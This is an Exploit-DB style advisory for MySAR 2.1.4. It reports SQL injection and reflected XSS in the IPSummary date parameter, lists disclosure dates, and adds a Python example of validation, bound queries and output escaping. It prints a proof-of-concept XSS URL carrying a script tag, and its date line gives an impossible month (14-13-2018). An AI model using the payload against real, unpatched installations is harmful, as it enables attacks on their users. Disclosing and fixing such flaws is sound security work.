Vendor: MySQL Squid Access Report
By: Keerati T.
CVSS: 8.8 (HIGH)
CWE: 89, 79 (SQL Injection and Cross Site Scripting)
Product Name: MySQL Squid Access Report
Affected Version From: 2.1.4
Affected Version To: 2.1.4
Patch Exists: NO
Related CWE: N/A
CPE: a:mysar:mysar:2.1.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
Year: 2018

MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities

SQL injection and cross-site scripting vulnerabilities are present in all parameters of MySAR. An example of a SQL injection attack is http://server/mysar/index.php?a=IPSummary&date=[SQLi], and an example of a cross-site scripting attack is http://server/mysar/index.php?a=IPSummary&date=2018-04-14"><script>alert(1)</script>

Mitigation:

Input validation and sanitization should be implemented to prevent SQL injection and Cross Site Scripting attacks.
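As an added illustration (not MySAR's own code, which the report does not show), the following Python models a hardened IPSummary handler for the date parameter: strict format validation, a bound query parameter, and HTML encoding of anything reflected back. The traffic table and its rows are constructed sample data, not the project's schema.

```python
import html
import re
import sqlite3
from datetime import date
from typing import Optional, Tuple

# Only a strictly formatted calendar date may reach the query or the page.
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def validate_date(value: str) -> Optional[str]:
    """Return the value if it is a real YYYY-MM-DD date, else None."""
    if not DATE_RE.fullmatch(value):
        return None
    try:
        date.fromisoformat(value)
    except ValueError:  # e.g. 2018-13-45 has the right shape but no such day
        return None
    return value


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for a per-IP traffic table (not MySAR's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE traffic (ip TEXT, day TEXT, bytes INTEGER)")
    conn.executemany("INSERT INTO traffic VALUES (?, ?, ?)", [
        ("10.0.0.5", "2018-04-14", 1200),
        ("10.0.0.7", "2018-04-14", 300),
        ("10.0.0.5", "2018-04-15", 900),
    ])
    return conn


def ip_summary(conn: sqlite3.Connection, raw_date: str) -> Tuple[int, str]:
    """Hardened IPSummary handler: validate, parameterise, encode on output.

    Returns an (HTTP status, HTML body) pair."""
    day = validate_date(raw_date)
    if day is None:
        # The rejected value is reflected only after HTML encoding, so a
        # payload such as "><script>alert(1)</script> renders as plain text.
        return 400, "<p>Invalid date: %s</p>" % html.escape(raw_date, quote=True)
    # Bound parameter: the value can never alter the SQL statement's structure.
    rows = conn.execute(
        "SELECT ip, SUM(bytes) FROM traffic WHERE day = ? GROUP BY ip ORDER BY ip",
        (day,),
    ).fetchall()
    items = "".join("<li>%s: %d</li>" % (html.escape(ip), total) for ip, total in rows)
    return 200, "<h1>IP summary for %s</h1><ul>%s</ul>" % (day, items)
```

Rejecting the value before it reaches the query is what closes the injection; encoding on output is what closes the reflection, and the two are independent controls.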
Source (Exploit-DB raw data):

# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities
# Date: 14-13-2018
# Software Link: https://sourceforge.net/projects/mysar/
# Exploit Author: Keerati T.
# Version: 2.1.4
# Tested on: Linux

1. Description
SQL injection and cross-site scripting vulnerabilities are found in all
parameters of MySAR.

2. Proof of Concept
For example:
- SQL injection
http://server/mysar/index.php?a=IPSummary&date=[SQLi]
- XSS
http://server/mysar/index.php?a=IPSummary&date=2018-04-14"><script>alert(1)</script>

3. Timeline
8-3-2018 - Reported on their GitHub (https://github.com/coffnix/mysar-ng/issues/12).
-- 1 month later, no response from vendor. --
14-4-2018 - Public.